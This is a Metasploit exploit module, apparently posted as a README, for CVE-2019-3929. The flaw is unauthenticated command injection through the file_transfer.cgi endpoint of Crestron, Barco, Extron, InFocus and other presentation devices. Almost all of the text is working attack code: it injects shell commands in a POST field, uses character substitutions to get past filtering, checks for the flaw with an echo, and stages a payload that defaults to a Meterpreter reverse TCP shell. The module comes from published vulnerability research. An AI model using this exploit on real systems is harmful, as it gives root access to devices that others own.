README.md
Rendering markdown...
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CRand
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Crestron/Barco/Extron/InFocus/TeqAV Remote Command Injection",
'Description' => %q{
The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent
WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron
ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA
firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5,
InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to
command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated
attacker can use this vulnerability to execute operating system commands as root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Tenable', 'Forrest' ],
'References' => [
[ 'CVE', 'CVE-2019-3929'],
[ 'URL', 'https://www.tenable.com/security/research/tra-2019-20' ],
[ 'URL', 'https://www.tenable.com/cve/CVE-2019-3929' ]
],
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
'Targets' => [
['armle', {'Arch' => ARCH_ARMLE}],
['x86', {'Arch' => ARCH_X86}],
['x64', {'Arch' => ARCH_X64}],
['mipsle', {'Arch' => ARCH_MIPSLE}]
],
'Privileged' => false,
'CmdStagerFlavor' => [ 'printf' ],
'DefaultOptions' => {
'SSL' => true,
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true
},
'DisclosureDate' => "2019-04-30",
'DefaultTarget' => 0)
)
register_options(
[
Opt::RPORT(443)
], self.class
)
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, 'Pa_Note')
cmd.gsub!(/ /, '+')
return cmd
end
def execute_command(cmd, opts = {})
begin
#print_line("file_transfer=new&dir='Pa_Note#{filter_bad_chars(cmd)}'")
res = send_request_cgi({
'uri' => '/cgi-bin/file_transfer.cgi',
'method' => 'POST',
'ssl' => true,
'port' => rport,
'data' => "file_transfer=new&dir='Pa_Note#{filter_bad_chars(cmd)}'",
'headers' => {
'ContentType' => 'application/x-www-form-urlencoded'
}
})
#print_line(res.body)
return res
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - HTTP(S) Connection Failed...")
return
end
end
def can_inject_commands
print_status("Checking for Remote Command Injection...")
random_length = (random_r % 32) + 64
verification_string = Rex::Text.rand_text_alphanumeric(random_length)
res = execute_command("echo #{verification_string}")
good_response = (
res &&
res.code == 200 &&
(res.body.include?(verification_string))
)
if good_response
print_good("#{rhost}:#{rport} - Successfully ran remote command...")
return true
else
print_error("#{rhost}:#{rport} - Failed to run remote command...")
return false
end
end
def check
success = can_inject_commands
if (success == true)
return CheckCode::Vulnerable
else
return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using the module'
end
end
def exploit
# Main function
print_status("Exploiting...")
execute_cmdstager(linemax: 200)
end
end